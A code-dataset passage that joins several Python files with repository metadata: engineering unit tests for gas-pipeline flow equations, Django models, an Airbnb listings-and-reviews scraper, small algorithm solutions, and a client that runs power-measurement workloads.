def test_isentropic_efficiency():
eta_s = isentropic_efficiency(1E5, 1E6, 1.4, eta_p=0.78)
assert_close(eta_s, 0.7027614191263858)
eta_p = isentropic_efficiency(1E5, 1E6, 1.4, eta_s=0.7027614191263858)
assert_close(eta_p, 0.78)
with pytest.raises(Exception):
isentropic_efficiency(1E5, 1E6, 1.4)
# Example 7.6 of the reference:
eta_s = isentropic_efficiency(1E5, 3E5, 1.4, eta_p=0.75)
assert_close(eta_s, 0.7095085923615653)
eta_p = isentropic_efficiency(1E5, 3E5, 1.4, eta_s=eta_s)
assert_close(eta_p, 0.75)
def test_polytropic_exponent():
assert_close(polytropic_exponent(1.4, eta_p=0.78), 1.5780346820809246)
assert_close(polytropic_exponent(1.4, n=1.5780346820809246), 0.78)
with pytest.raises(Exception):
polytropic_exponent(1.4)
def test_compressible():
T = T_critical_flow(473, 1.289)
assert_close(T, 413.2809086937528)
P = P_critical_flow(1400000, 1.289)
assert_close(P, 766812.9022792266)
assert not is_critical_flow(670E3, 532E3, 1.11)
assert is_critical_flow(670E3, 101E3, 1.11)
SE = stagnation_energy(125)
assert_close(SE, 7812.5)
PST = P_stagnation(54050., 255.7, 286.8, 1.4)
assert_close(PST, 80772.80495900588)
Tst = T_stagnation(286.8, 54050, 54050*8, 1.4)
assert_close(Tst, 519.5230938217768)
Tstid = T_stagnation_ideal(255.7, 250, 1005.)
assert_close(Tstid, 286.79452736318405)
def test_Panhandle_A():
# Example 7-18 Gas of Crane TP 410M
D = 0.340
P1 = 90E5
P2 = 20E5
L = 160E3
SG=0.693
Tavg = 277.15
Q = 42.56082051195928
# Test all combinations of relevant missing inputs
assert_close(Panhandle_A(D=D, P1=P1, P2=P2, L=L, SG=SG, Tavg=Tavg), Q)
assert_close(Panhandle_A(D=D, Q=Q, P2=P2, L=L, SG=SG, Tavg=Tavg), P1)
assert_close(Panhandle_A(D=D, Q=Q, P1=P1, L=L, SG=SG, Tavg=Tavg), P2)
assert_close(Panhandle_A(D=D, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), L)
assert_close(Panhandle_A(L=L, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), D)
with pytest.raises(Exception):
Panhandle_A(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Panhandle_B():
# Example 7-18 Gas of Crane TP 410M
D = 0.340
P1 = 90E5
P2 = 20E5
L = 160E3
SG=0.693
Tavg = 277.15
Q = 42.35366178004172
# Test all combinations of relevant missing inputs
assert_close(Panhandle_B(D=D, P1=P1, P2=P2, L=L, SG=SG, Tavg=Tavg), Q)
assert_close(Panhandle_B(D=D, Q=Q, P2=P2, L=L, SG=SG, Tavg=Tavg), P1)
assert_close(Panhandle_B(D=D, Q=Q, P1=P1, L=L, SG=SG, Tavg=Tavg), P2)
assert_close(Panhandle_B(D=D, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), L)
assert_close(Panhandle_B(L=L, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), D)
with pytest.raises(Exception):
Panhandle_B(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Weymouth():
D = 0.340
P1 = 90E5
P2 = 20E5
L = 160E3
SG=0.693
Tavg = 277.15
Q = 32.07729055913029
assert_close(Weymouth(D=D, P1=P1, P2=P2, L=L, SG=SG, Tavg=Tavg), Q)
assert_close(Weymouth(D=D, Q=Q, P2=P2, L=L, SG=SG, Tavg=Tavg), P1)
assert_close(Weymouth(D=D, Q=Q, P1=P1, L=L, SG=SG, Tavg=Tavg), P2)
assert_close(Weymouth(D=D, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), L)
assert_close(Weymouth(L=L, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), D)
with pytest.raises(Exception):
Weymouth(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Spitzglass_high():
D = 0.340
P1 = 90E5
P2 = 20E5
L = 160E3
SG=0.693
Tavg = 277.15
Q = 29.42670246281681
assert_close(Spitzglass_high(D=D, P1=P1, P2=P2, L=L, SG=SG, Tavg=Tavg), Q)
assert_close(Spitzglass_high(D=D, Q=Q, P2=P2, L=L, SG=SG, Tavg=Tavg), P1)
assert_close(Spitzglass_high(D=D, Q=Q, P1=P1, L=L, SG=SG, Tavg=Tavg), P2)
assert_close(Spitzglass_high(D=D, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), L)
assert_close(Spitzglass_high(L=L, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), D)
with pytest.raises(Exception):
Spitzglass_high(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Spitzglass_low():
D = 0.154051
P1 = 6720.3199
P2 = 0
L = 54.864
SG=0.6
Tavg = 288.7
Q = 0.9488775242530617
assert_close(Spitzglass_low(D=D, P1=P1, P2=P2, L=L, SG=SG, Tavg=Tavg), Q)
assert_close(Spitzglass_low(D=D, Q=Q, P2=P2, L=L, SG=SG, Tavg=Tavg), P1)
assert_close(Spitzglass_low(D=D, Q=Q, P1=P1, L=L, SG=SG, Tavg=Tavg), P2, atol=1E-10)
assert_close(Spitzglass_low(D=D, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), L)
assert_close(Spitzglass_low(L=L, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), D)
with pytest.raises(Exception):
Spitzglass_low(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Oliphant():
D = 0.340
P1 = 90E5
P2 = 20E5
L = 160E3
SG=0.693
Tavg = 277.15
Q = 28.851535408143057
assert_close(Oliphant(D=D, P1=P1, P2=P2, L=L, SG=SG, Tavg=Tavg), Q)
assert_close(Oliphant(D=D, Q=Q, P2=P2, L=L, SG=SG, Tavg=Tavg), P1)
assert_close(Oliphant(D=D, Q=Q, P1=P1, L=L, SG=SG, Tavg=Tavg), P2)
assert_close(Oliphant(D=D, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), L)
assert_close(Oliphant(L=L, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), D)
with pytest.raises(Exception):
Oliphant(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Fritzsche():
D = 0.340
P1 = 90E5
P2 = 20E5
L = 160E3
SG=0.693
Tavg = 277.15
Q = 39.421535157535565
assert_close(Fritzsche(D=D, P1=P1, P2=P2, L=L, SG=SG, Tavg=Tavg), Q)
assert_close(Fritzsche(D=D, Q=Q, P2=P2, L=L, SG=SG, Tavg=Tavg), P1)
assert_close(Fritzsche(D=D, Q=Q, P1=P1, L=L, SG=SG, Tavg=Tavg), P2)
assert_close(Fritzsche(D=D, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), L)
assert_close(Fritzsche(L=L, Q=Q, P1=P1, P2=P2, SG=SG, Tavg=Tavg), D)
with pytest.raises(Exception):
Fritzsche(D=0.340, P1=90E5, L=160E3, SG=0.693, Tavg=277.15)
def test_Muller():
D = 0.340
mu = 1E-5
P1 = 90E5
P2 = 20E5
L = 160E3
SG=0.693
Tavg = 277.15
Q = 60.45796698148663
assert_close(Muller(D=D, P1=P1, P2=P2, L=L, SG=SG, mu=mu, Tavg=Tavg), Q)
assert_close(Muller(D=D, Q=Q, P2=P2, L=L, SG=SG, mu=mu, Tavg=Tavg), P1)
assert_close(Muller(D=D, Q=Q, P1=P1, L=L, SG=SG, mu=mu, Tavg=Tavg), P2)
assert_close(Muller(D=D, Q=Q, P1=P1, P2=P2, SG=SG, mu=mu, Tavg=Tavg), L)
assert_close(Muller(L=L, Q=Q, P1=P1, P2=P2, SG=SG, mu=mu, Tavg=Tavg), D)
with pytest.raises(Exception):
Muller(D=D, P2=P2, L=L, SG=SG, mu=mu, Tavg=Tavg)
def test_IGT():
D = 0.340
mu = 1E-5
P1 = 90E5
P2 = 20E5
L = 160E3
SG=0.693
Tavg = 277.15
Q = 48.92351786788815
assert_close(IGT(D=D, P1=P1, P2=P2, L=L, SG=SG, mu=mu, Tavg=Tavg), Q)
assert_close(IGT(D=D, Q=Q, P2=P2, L=L, SG=SG, mu=mu, Tavg=Tavg), P1)
assert_close(IGT(D=D, Q=Q, P1=P1, L=L, SG=SG, mu=mu, Tavg=Tavg), P2)
assert_close(IGT(D=D, Q=Q, P1=P1, P2=P2, SG=SG, mu=mu, Tavg=Tavg), L)
assert_close(IGT(L=L, Q=Q, P1=P1, P2=P2, SG=SG, mu=mu, Tavg=Tavg), D)
with pytest.raises(Exception):
IGT(D=D, P2=P2, L=L, SG=SG, mu=mu, Tavg=Tavg)
def test_isothermal_gas():
mcalc = isothermal_gas(11.3, 0.00185, P1=1E6, P2=9E5, L=1000, D=0.5)
assert_close(mcalc, 145.484757264)
assert_close(isothermal_gas(11.3, 0.00185, P1=1E6, P2=9E5, m=145.484757264, D=0.5), 1000)
assert_close(isothermal_gas(11.3, 0.00185, P2=9E5, m=145.484757264, L=1000., D=0.5), 1E6)
assert_close(isothermal_gas(11.3, 0.00185, P1=1E6, m=145.484757264, L=1000., D=0.5), 9E5)
assert_close(isothermal_gas(11.3, 0.00185, P1=1E6, P2=9E5, m=145.484757264, L=1000.), 0.5)
with pytest.raises(Exception):
isothermal_gas(11.3, 0.00185, P1=1E6, P2=9E5, L=1000)
with pytest.raises(Exception):
isothermal_gas(rho=11.3, fd=0.00185, P1=1E6, P2=1E5, L=1000, D=0.5)
with pytest.raises(Exception):
isothermal_gas(rho=11.3, fd=0.00185, P2=1E6, P1=9E5, L=1000, D=0.5)
# Newton can't converge, need a bounded solver
P1 = isothermal_gas(rho=11.3, fd=0.00185, m=390, P2=9E5, L=1000, D=0.5)
assert_close(P1, 2298973.786533209)
# Case where the desired flow is greated than the choked flow's rate
with pytest.raises(Exception):
isothermal_gas(rho=11.3, fd=0.00185, m=400, P2=9E5, L=1000, D=0.5)
# test the case where the ideal gas assumption is baked in:
rho = 10.75342009105268 # Chemical('nitrogen', P=(1E6+9E5)/2).rho
m1 = isothermal_gas(rho=rho, fd=0.00185, P1=1E6, P2=9E5, L=1000, D=0.5)
assert_close(m1, 141.92260633059334)
# They are fairly similar
from math import log, pi
fd = 0.00185
P1 = 1E6
P2 = 9E5
L = 1000
D = 0.5
T = 298.15
# from scipy.constants import R
# from thermo import property_molar_to_mass, Chemical, pi, log
R = 296.8029514446658 # property_molar_to_mass(R, Chemical('nitrogen').MW)
m2 = (pi**2/16*D**4/(R*T*(fd*L/D + 2*log(P1/P2)))*(P1**2-P2**2))**0.5
assert_close(m2, 145.48786057477403)
def test_P_isothermal_critical_flow():
P2_max = P_isothermal_critical_flow(P=1E6, fd=0.00185, L=1000., D=0.5)
assert_close(P2_max, 389699.7317645518) | [
"Caleb.Andrew.Bell@gmail.com"
] | Caleb.Andrew.Bell@gmail.com |
8c1b72abd6090fc6d7b1f0f79362a9bd829c531a | c0b02bf77168b5770a86e8beb341738083a253a7 | /api_server/master_server/models.py | 3e9e65f3860d1b2d1fdda575e4607778aa2af3b5 | [] | no_license | nhoss2/pymada | 61fe4df9c107b66df14bf1384716f370e6d23102 | ec537e938a593e830ca82249b82531a881430dd5 | refs/heads/master | 2022-12-13T20:44:09.745576 | 2020-05-27T17:05:46 | 2020-05-27T17:05:46 | 204,399,744 | 0 | 1 | null | 2022-12-08T09:31:54 | 2019-08-26T05:06:07 | Python | UTF-8 | Python | false | false | 2,034 | py | from django.db import models
class UrlTask(models.Model):
task_states = (
('QUEUED', 'QUEUED'),
('ASSIGNED', 'ASSIGNED'),
('COMPLETE', 'COMPLETE')
)
url = models.TextField()
json_metadata = models.TextField(null=True)
task_result = models.TextField(null=True)
task_state = models.CharField(choices=task_states, max_length=10, default='QUEUED')
assigned_agent = models.ForeignKey('Agent', on_delete=models.CASCADE, null=True)
fail_num = models.IntegerField(default=0)
start_time = models.FloatField(default=0)
end_time = models.FloatField(default=0)
class Agent(models.Model):
agent_states = (
('IDLE', 'IDLE'),
('RUNNING', 'RUNNING'),
('ASSIGNED', 'ASSIGNED'), # assigned task
('LOST', 'LOST'),
('NO_RUNNER', 'NO_RUNNER')
)
hostname = models.TextField()
agent_state = models.CharField(choices=agent_states, max_length=10, default='NO_RUNNER')
last_contact_attempt = models.IntegerField()
agent_url = models.CharField(max_length=300)
runner_num = models.IntegerField(null=True)
assigned_task = models.ForeignKey('UrlTask', on_delete=models.CASCADE, null=True)
class Runner(models.Model):
contents = models.TextField()
file_name = models.CharField(max_length=200)
file_type = models.CharField(max_length=200) # used by agent_server, must be exact match from agent_server.py
custom_executable = models.CharField(max_length=200, null=True)
dependency_file = models.TextField(null=True)
class ErrorLog(models.Model):
message = models.TextField()
reporting_agent = models.ForeignKey('Agent', on_delete=models.CASCADE, null=True)
runner = models.ForeignKey('Runner', on_delete=models.CASCADE, null=True)
timestamp = models.DateTimeField(auto_now_add=True)
class Screenshot(models.Model):
task = models.ForeignKey('UrlTask', on_delete=models.CASCADE, null=True)
timestamp = models.DateTimeField(auto_now_add=True)
screenshot = models.ImageField()
| [
"nafis@labs.im"
] | nafis@labs.im |
bbefec74ec05c8be2358eb6d37693b79a119f68a | a4830a0189c325c35c9021479a5958ec870a2e8b | /routing/migrations/0022_auto_20160819_1523.py | 9a72cd9f00d71edcf95d1e679496d2ced9546eee | [] | no_license | solutionprovider9174/steward | 044c7d299a625108824c854839ac41f51d2ca3fd | fd681593a9d2d339aab0f6f3688412d71cd2ae32 | refs/heads/master | 2022-12-11T06:45:04.544838 | 2020-08-21T02:56:55 | 2020-08-21T02:56:55 | 289,162,699 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 887 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-08-19 15:23
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('routing', '0021_fraudbypasshistory_outboundroutehistory'),
]
operations = [
migrations.AlterModelOptions(
name='fraudbypass',
options={'ordering': ('number',)},
),
migrations.AlterModelOptions(
name='outboundroute',
options={'ordering': ('number',)},
),
migrations.AlterField(
model_name='fraudbypasshistory',
name='number',
field=models.CharField(max_length=64, validators=[django.core.validators.RegexValidator(code='nomatch', message='Must be 10 digits', regex='^\\d{10}$')]),
),
]
| [
"guangchengwang9174@yandex.com"
] | guangchengwang9174@yandex.com |
681d7bd02ccb0578a7842aa55f7bc5a99400f534 | 0859a864b1270164fe44a878ab12cfb3302c36bf | /abc159/a.py | fe00ff3096ace83f6c7f54a99fa07d13cf37865b | [] | no_license | wataoka/atcoder | f359d49ab6e0db39c019d9f6d2e8b92d35f723c4 | b91465dd5f655d05b89485fc7ad222283c5958f5 | refs/heads/master | 2021-04-15T06:02:59.593965 | 2020-05-11T04:38:23 | 2020-05-11T04:38:23 | 126,754,342 | 0 | 0 | null | 2020-02-28T02:31:03 | 2018-03-26T00:51:12 | Python | UTF-8 | Python | false | false | 106 | py | def rC2(r):
return int(r*(r-1)//2)
N, M = list(map(int, input().split()))
print(rC2(r=N) + rC2(r=M)) | [
"wataoka@stu.kobe-u.ac.jp"
] | wataoka@stu.kobe-u.ac.jp |
96488cf113baf9488bed5f39de99090512a92017 | e1d9187552b25ef8835d1c5219e35edc7d6c1139 | /price_parcer.py | b2ccb7075fc975bfc1fb519c8c6c5700faf46a16 | [] | no_license | iamishalkin/airbnb | 63b6338cdb323ebc2b6bf4a535e9c36258ff7b4c | 40bea3547f1c7a281b39345f7dcb1e2a7d75171f | refs/heads/master | 2021-01-19T20:29:49.373930 | 2020-04-14T09:47:16 | 2020-04-14T09:47:16 | 88,510,755 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,983 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 13 11:26:47 2017
@author: ivan
"""
import requests
import json
import pandas as pd
BASE='https://api.airbnb.com/v2/search_results?client_id=3092nxybyb0otqw18e8nh5nty&_limit=18&sort=1&locale=ru-RU'
price_range=[300,400,500,600,700,800,900,950,1000,1050,1100,
1150,1200,1250,1300,1350,1400,1450,1500,1550,1600,
1650,1700,1750,1800,1850,1900,1950,2000,2100,2200,
2300,2400,2500,2600,2700,2800,2900,3000,3100,3200,
3300,3400,3500,3600,3700,4000,5000,6000,7000,8000,
13000,15000]
while True:
city=input('Введите город, как в airbnb (Samara--Samara-Oblast--Russia): ')
city_short=city[0:city.find('--')]
APARTMENTS=[] #this dataframe will be converted to csv
REVIEWS=[]
for idx, price in enumerate(price_range):
price_min=price_range[idx]
if idx == len(price_range)-1:
break
price_max=price_range[1+idx]
print(price_min,price_max)
for page in range(20):
url=BASE + '&_offset='+str(page*50)+'&location=' + city +'&_limit=50'+'&price_min=' +str(price_min)+'&price_max='+str(price_max)
jsonpage = json.loads(requests.get(url).text)
if jsonpage.get('search_results')==[]:
break
else:
observ=jsonpage.get('search_results')
for i in range(len(observ)):
idf=observ[i].get('listing') #get each listing
listing_url='https://api.airbnb.com/v2/listings/'+str(idf.get('id'))+'?client_id=3092nxybyb0otqw18e8nh5nty&_format=v1_legacy_for_p3&locale=ru-RU'
listing_jsonpage = json.loads(requests.get(listing_url).text)
ftrs=listing_jsonpage.get('listing')
amen=ftrs.get('amenities_ids')
APARTMENTS.append({
"apart_id":idf.get('id'),
'apart_name': ftrs.get('name'),
'description':ftrs.get('summary'),#description
#'amenities':ftrs.get('amenities'),#udobstva need to be extended with amenities_ids
'bathrooms':ftrs.get('bathrooms'),
'bed_type':ftrs.get('bed_type'),#probably need ftrs.get('bed_type_category')
'bedrooms':ftrs.get('bedrooms'),
'beds':ftrs.get('beds'),
'cancellation_policy':ftrs.get('cancellation_policy'),
#'check_in_time_start':ftrs.get('check_in_time_start'), #time when you are allowed to check in
#'check_out_time':ftrs.get('check_out_time'),
'city':ftrs.get('city'),
'cleaning_fee_native':ftrs.get('cleaning_fee_native'),
'country':ftrs.get('counntry'),#ftrs.get('country_code')
'description':ftrs.get('description'),
'extra_user_info':ftrs.get('extra_user_info'),
'extra_price_native':ftrs.get('extra_price_native'),
'guests_included':ftrs.get('guests_included'),
'has_agreed_to_legal_terms':ftrs.get('has_agreed_to_legal_terms'),
#'has_license':ftrs.get('has_license'),
'host_id':ftrs.get('hosts')[0].get('id'),
'house_rules':ftrs.get('house_rules'),
'in_building':ftrs.get('in_building'),
'instant_bookable':ftrs.get('instant_bookable'),
'interaction':ftrs.get('interaction'),#about hosts
'is_location_exact':ftrs.get('is_location_exact'),
'lat':ftrs.get('lat'),
'lng':ftrs.get('lng'),
#'listing_native_currency':ftrs.get('listing_native_currency'),
#'listing_cleaning_fee_native':ftrs.get('listing_cleaning_fee_native'),
#'listing_price_for_extra_person_native':ftrs.get('listing_price_for_extra_person_native'),
'max_nights':ftrs.get('max_nights'),
'min_nights':ftrs.get('min_nights'),
'monthly_price_factor':ftrs.get('monthly_price_factor'),
'native_currency':ftrs.get('native_currency'),
'neighborhood':ftrs.get('neighborhood'),#region
'neighborhood_overview':ftrs.get('neighborhood'),#region description
'notes':ftrs.get('notes'),#small description, some notes
'person_capacity':ftrs.get('person_capacity'),
'photo_url':ftrs.get('medium-url'),#.str.replace(u'?aki_policy=medium', ''),
'picture_count':ftrs.get('picture_count'),
'price_native':ftrs.get('price_native'),
'price_for_extra_person_native':ftrs.get('price_for_extra_person_native'),
'property_type':ftrs.get('property_type'),
'require_guest_phone_verification':ftrs.get('require_guest_phone_verification'),
'review_rating_accuracy':ftrs.get('review_rating_accuracy'),
'review_rating_checkin':ftrs.get('review_rating_checkin'),
'review_rating_cleanliness':ftrs.get('review_rating_cleanliness'),
'review_rating_communication':ftrs.get('review_rating_communication'),
'review_rating_location':ftrs.get('review_rating_location'),
'review_rating_value':ftrs.get('review_rating_value'),
'reviews_count':ftrs.get('reviews_count'),
'room_type':ftrs.get('room_type'),
'room_type_category':ftrs.get('room_type_category'),
'space':ftrs.get('space'),
#'special_offer':ftrs.get('special_offer'),
'square_feet':ftrs.get('square_feet'),
'star_rating':ftrs.get('star_rating'),
#'time_zone_name':ftrs.get('time_zone_name'),
#'toto_opt_in':ftrs.get('toto_opt_in'),
'transit':ftrs.get('transit'),
'weekly_price_factor':ftrs.get('weekly_price_factor'),
"Kitchen":8 in amen, #',"Кухня"
"Internet":3 in amen, #',"Интернет"
"TV":1 in amen, #',"Телевизор"
"Essentials":40 in amen, #',"Туалетные принадлежности"
"Shampoo":41 in amen, #',"Шампунь"
"Heating":30 in amen, #',"Отопление"
"Air_conditioning":5 in amen, #',"Кондиционер"
"Washer":33 in amen, #',"Стиральная машина"
"Dryer":34 in amen, #',"Сушильная машина"
"Free_parking_on_premises":9 in amen, #',"Бесплатная парковка"
"Free_parking_on_street":23 in amen, #',"Бесплатная парковка на улице"
"Paid_parking_off_premises":10 in amen, #',"Платная парковка рядом"
"Wireless_Internet":4 in amen, #',"Беспроводной Интернет"
"Cable_TV":2 in amen, #',"Кабельное телевидение"
"Breakfast":16 in amen, #',"Завтрак"
"Pets_allowed":12 in amen, #',"Можно с питомцами"
"Family_kid_friendly":31 in amen, #',"Подходит для детей/семей"
"Suitable_for_events":32 in amen, #',"Подходит для проведения мероприятий"
"Smoking_allowed":11 in amen, #',"Можно курить"
"Wheelchair_accessible":6 in amen, #',"Подходит людям с ограниченными возможностями"
"Elevator_in_building":21 in amen, #',"Лифт"
"Indoor_fireplace":27 in amen, #',"Камин"
"Buzzer_wireless_intercom":28 in amen, #',"Домофон"
"Doorman":14 in amen, #',"Вахтер"
"Pool":7 in amen, #',"Бассейн"
"Hot_tub":25 in amen, #',"Джакузи"
"Gym":15 in amen, #',"Спортзал"
"Hangers":44 in amen, #',"Плечики"
"Iron":46 in amen, #',"Утюг"
"Hair_dryer":45 in amen, #',"Фен"
"Laptop_friendly_workspace":47 in amen, #',"Место для работы на ноутбуке"
"Smoke_detector":35 in amen, #',"Пожарная сигнализация"
"Carbon_monoxide_detector":36 in amen, #',"Детектор угарного газа"
"First_aid_kit":37 in amen, #',"Аптечка"
"Safety_card":38 in amen, #',"Памятка по безопасности"
"Fire_extinguisher":39 in amen, #',"Огнетушитель"
"Lock_on_bedroom_door":42 in amen, #',"Замок на двери в спальню"
"Self_Check_In":51 in amen, #',"Самостоятельное прибытие"
'url': 'https://www.airbnb.com/rooms/'+str(idf.get('id'))
})
if ftrs.get('reviews_count') == 0:
#has no reviews
continue
else:
#has some
print('listing has some reviews')
revurl='https://api.airbnb.com/v2/reviews?client_id=3092nxybyb0otqw18e8nh5nty&listing_id=' + str(idf.get('id'))+'&role=all'
json_review_page = json.loads(requests.get(revurl).text)
revs=json_review_page.get('reviews')#list with review dicts
#print(revurl)
for g in range(len(revs)):
revdict=revs[g]
REVIEWS.append({
'apart_id':idf.get('id'),
'author_id':revdict.get('author_id'),
'date':revdict.get('created_at'),
'review':revdict.get('comments')
})
fd=pd.DataFrame(REVIEWS)
fd.to_csv('reviews/Review_'+city_short+'.csv' , header=True, index=False, encoding='utf-8')
df = pd.DataFrame(APARTMENTS)
df.to_csv('apartments/'+city_short+'.csv' , header=True, index=False, encoding='utf-8')
print(city_short, ' collected')
| [
"noreply@github.com"
] | iamishalkin.noreply@github.com |
9434fd3c1d1715f323f8d9c6fc8f1097ccd9a93e | 0cdcee391e178092d7073734957075c72681f037 | /hackerrank/si/si-smaller-element-left-side.py | 10a600c468bd60c31b9b74c6e23fe144363e00bf | [] | no_license | hrishikeshtak/Coding_Practises_Solutions | 6b483bbf19d5365e18f4ea1134aa633ff347a1c1 | 86875d7436a78420591a60b716acd2780287b4a8 | refs/heads/master | 2022-10-06T18:44:56.992451 | 2022-09-25T03:29:03 | 2022-09-25T03:29:03 | 125,744,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 903 | py | #!/usr/bin/python3
# Find 1st smaller elements on left side
class Solution:
# @param A : list of integers
# @return a list of integers
def prevSmaller(self, arr):
N = len(arr)
s = [-1] * N
b = [-1] * N
top = -1
top += 1
s[top] = 0
for i in range(1, N):
# print("stack: ", s)
# print("b: ", b)
while top >= 0:
if arr[i] > arr[s[top]]:
b[i] = arr[s[top]]
top += 1
s[top] = i
break
else:
top -= 1
if top == -1:
b[i] = -1
top += 1
s[top] = i
return b
if __name__ == '__main__':
A = [4, 5, 2, 10, 8]
A = [3, 2, 1]
A = [39, 27, 11, 4, 24, 32, 32, 1]
print(Solution().prevSmaller(A))
| [
"hrishikesh.tak@oneconvergence.com"
] | hrishikesh.tak@oneconvergence.com |
588bbf7a72dd67ac3e076650b05aeb73ce05b950 | b1a48bc7b2ce2aa1f400382f2a275a384e8be2a2 | /ptd_client_server/client.py | bab3221d4ab0ae73715cb6085761c43a2488f8a8 | [
"Apache-2.0"
] | permissive | xzfc/mlcommons-power | d281b654591ee203b27444ee5a3b37a20c0b5530 | af35f05f8e17d9f3ba15385ea622c6afbb66799d | refs/heads/master | 2023-02-24T03:55:31.833505 | 2020-12-18T09:34:56 | 2020-12-18T09:34:56 | 320,599,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,263 | py | #!/usr/bin/env python3
# Copyright 2018 The MLPerf Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import argparse
import base64
import json
import logging
import os
import socket
import subprocess
import time
import lib
def command(server: lib.Proto, command: str, check: bool = False):
logging.info(f"Sending command to the server: {command!r}")
response = server.command(command)
logging.info(f"Got response: {response!r}")
if check and response != "OK":
logging.fatal("Got an unexpecting response from the server")
exit(1)
lib.init("client")
parser = argparse.ArgumentParser(description="PTD client")
# fmt: off
parser.add_argument(
"-c", "--config", metavar="FILE", type=str,
help="""
Client configuration file path.
Note that the same options could be configured through the command line.
""")
parser.add_argument(
"-p", "--serverPort", metavar="PORT", type=int, default=4950,
help="Server port")
parser.add_argument(
"-i", "--serverIpAddress", metavar="ADDR", type=str, required=True,
help="Server IP address")
parser.add_argument(
"-o", "--output", metavar="DIR", type=str, default="out",
help="Output directory")
parser.add_argument(
"--ntp-command", metavar="CMD", type=str,
help="""A command to run after connecting to the server.""")
parser.add_argument(
"--run-before", metavar="CMD", type=str,
help="""
A command to run before power measurement.
Some preparation could be done here, if necessary.
""")
parser.add_argument(
"--run-workload", metavar="CMD", type=str,
help="""
A command to run under power measurement.
An actual workload should be done here.
""")
parser.add_argument(
"--run-after", metavar="CMD", type=str,
help="""
A command to run after power measurement is done.
A cleanup or some log processing could be done here, if necessary.
""")
# fmt: on
args = parser.parse_args()
if args.config is not None:
with open(args.config, "r") as f:
config = json.load(f)
else:
config = {}
if args.run_before is None:
args.run_before = config.get("runBefore", "")
if args.run_workload is None:
args.run_workload = config.get("runWorkload", None)
if args.run_workload is None:
logging.fatal("--run-workload option is mandatory")
exit(1)
if args.run_after is None:
args.run_after = config.get("runAfter", "")
if args.ntp_command is None:
args.ntp_command = config.get("ntpCommand", "")
if os.path.exists(args.output):
logging.fatal(f"The output directory {args.output!r} already exists.")
logging.fatal("Please remove it or select another directory.")
exit(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((args.serverIpAddress, args.serverPort))
serv = lib.Proto(s)
if serv.command("hello") != "Hello from server!":
logging.fatal("Not a server")
exit(1)
logging.info(f"Creating output directory {args.output!r}")
os.mkdir(args.output)
logging.info(f"Running {args.ntp_command!r}")
subprocess.run(args.ntp_command, shell=True, check=True)
command(serv, "init", check=True)
client_time1 = time.time()
serv_time = float(serv.command("time"))
client_time2 = time.time()
dt1 = 1000 * (client_time1 - serv_time)
dt2 = 1000 * (client_time2 - serv_time)
logging.info(f"The time difference is in {dt1:.3}ms..{dt2:.3}ms")
for mode in ["ranging", "testing"]:
logging.info(f"Running workload in {mode} mode")
out = f"{args.output}/{mode}"
os.mkdir(out)
env = os.environ.copy()
env["ranging"] = "1" if mode == "ranging" else "0"
env["out"] = out
logging.info("Running runBefore")
subprocess.run(args.run_before, shell=True, check=True, env=env)
command(serv, f"start-{mode},workload", check=True)
logging.info("Running runWorkload")
subprocess.run(args.run_workload, shell=True, check=True, env=env)
command(serv, "stop", check=True)
log = serv.command("get-last-log")
if log is None or not log.startswith("base64 "):
logging.fatal("Could not get log from the server")
exit(1)
with open(out + "/spl.txt", "wb") as f:
f.write(base64.b64decode(log[len("base64 ") :]))
logging.info("Running runAfter")
subprocess.run(args.run_after, shell=True, check=True, env=env)
logging.info("Done runs")
log = serv.command("get-log")
if log is None or not log.startswith("base64 "):
logging.fatal("Could not get log from the server")
exit(1)
with open(args.output + "/spl-full.txt", "wb") as f:
f.write(base64.b64decode(log[len("base64 ") :]))
logging.info("Successful exit")
| [
"albert.safin@xored.com"
] | albert.safin@xored.com |
ce8172e73f8dbe5b64f6896e1a018ef2b910b9f3 | c60b5d841e3a1e79a15335bbd3c4e8128d77ad94 | /Main.py | a24a78f4fffd69710ce8577be465d245e04fed02 | [] | no_license | ClaudiuChelcea/Presentation-Website | fbc035dd79eb036fde7475ff4b52ad229999777e | 89fc48814dc33085a59e148889424b0dcb86b222 | refs/heads/main | 2023-06-13T00:15:50.205264 | 2021-07-12T14:04:49 | 2021-07-12T14:04:49 | 331,597,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,694 | py | from flask import Flask, render_template, request
from flask_mail import Mail, Message
# The webpages are:
# Home: http://127.0.0.1:5000/index
